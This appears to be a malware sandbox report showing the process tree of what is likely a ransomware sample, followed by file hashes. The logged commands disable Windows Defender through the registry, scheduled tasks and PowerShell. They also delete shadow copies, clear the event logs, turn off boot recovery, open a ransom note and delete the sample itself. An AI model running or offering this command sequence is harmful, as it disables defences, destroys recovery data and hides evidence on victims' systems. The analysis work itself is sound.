C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_1961a" start= disabled2⤵
- Launches sc.exe
PID:4960
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2288
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:3136
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:4624
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:4340
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:4064
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:760
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:3668
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:4184
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2816
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1444
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:2312
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:4968
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:4024
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:3936
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:4712
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:5064
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1752
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:4012
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1840
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:4468
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1304
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:748
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:4288
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:2060
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:4236
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:4416
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:5072
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3576
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:4188
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:360
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:5016
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:2808
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2332
-
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:2456
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4856
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4180
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4936
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3184
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4708
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:3732
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1192
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:4644
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2264
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4432
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:3484
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3504
-
-
-
C:\Windows\SYSTEM32\notepad.exenotepad.exe C:\n8pw_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:3364
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\211xahcou.exe"2⤵PID:4192
-
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:372
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD562623d22bd9e037191765d5083ce16a3
SHA14a07da6872672f715a4780513d95ed8ddeefd259
SHA25695d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010
SHA5129a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992
-
Filesize
1KB
MD5d3eca3baec61c36c9353ef1699b8bfca
SHA1f084193262e0d462165cfac58e1422ab90df7514
SHA2563ef5776a2dfd960f996ab765efa2b117d3e3135dc8e196aa7bdc525bd4125678
SHA5128d8eb00e0764ea07a999d0f07bd21f4f4b8169f19673de0cea833670c38edd41792136a63036477bebeb2a0fbbca5f4faafb381f8fd4ffb178d4209e073e2a17